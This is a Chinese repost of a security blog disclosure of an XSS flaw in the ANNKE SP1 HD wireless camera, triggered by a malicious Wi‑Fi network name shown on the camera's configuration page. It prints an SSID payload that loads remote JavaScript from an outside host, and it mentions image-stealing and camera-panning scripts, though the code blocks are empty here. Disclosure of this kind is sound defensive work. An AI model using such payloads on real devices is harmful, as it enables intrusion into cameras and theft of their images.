如何通过XSS入侵网络摄像头
Posted 物联网IOT安全
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何通过XSS入侵网络摄像头相关的知识,希望对你有一定的参考价值。
我们在ANNKE SP1 HD无线摄像头(固件版本v3.4.1.1604071109)中发现了一个风险较低但十分有趣的XSS。有趣的是,在Annke Web界面中查看可用的Wi-Fi接入点时会触发XSS。
因此,如果在摄像头的WIFI范围内有如下SSID:
"<script src=//xjs.io></script>当受害者访问无线配置页面时,SP1相机将加载并运行在http://xjs.io/上的JavaScript代码。这是因为他扫描了附近的无线网络,并将能够连接的SSID直接显示在了页面上。
为了验证我们的想法,我们编写一个脚本来从相机中窃取图像。
利用XSS获取图像:
官方可能已经修复了它,显然,人们现在需要开始关心物理接近利用这个问题,虽然它并不是一个巨大的漏洞。但它确实说明供应商需要小心验证来自任何源的输入,而不仅仅是Web界面上的GET/POST参数。
如果你想做点更有意思的事,可以使用这个脚本https://github.com/pentestpartners/bits-for-blog/blob/master/annke-spin.js让摄像头进行平移。
附上代码:
本文翻译自:
https://www.pentestpartners.com/security-blog/nifty-xss-in-annke-sp1-hd-wireless-camera/
以上是关于如何通过XSS入侵网络摄像头的主要内容,如果未能解决你的问题,请参考以下文章